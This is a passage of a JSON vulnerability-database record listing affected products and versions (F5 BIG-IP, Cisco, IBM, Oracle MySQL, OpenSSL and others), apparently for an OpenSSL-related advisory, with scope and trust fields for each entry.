}, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.11" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip apm hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "big-ip pem hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.2.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "big-ip pem hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.18" }, { "model": "big-ip dns hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "big-ip asm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "big-ip aam hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "big-ip asm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip websafe hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "big-iq centralized management", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "5.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "big-ip ltm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip afm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip websafe", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "big-ip link controller build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip link controller hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip aam hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "big-iq adc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.15" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "big-ip aam hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip analytics hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "big-ip afm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.21" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "big-ip websafe hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip link controller hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "big-ip asm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip afm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "big-ip psm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "big-ip dns hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.0" }, { "model": "big-ip analytics build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "big-ip aam hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "big-ip link controller hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "big-iq cloud and orchestration", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "big-ip analytics hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.2.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "big-ip gtm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "big-ip aam build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip gtm build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "big-ip ltm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "big-ip apm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "big-ip ltm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip asm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "big-ip afm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "big-ip websafe hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "big-ip aam hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip aam hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "big-ip apm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "big-ip pem hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "big-ip analytics hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "big-ip asm build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "big-ip pem hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip dns", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "project openssl 1.0.1u", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip websafe hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", 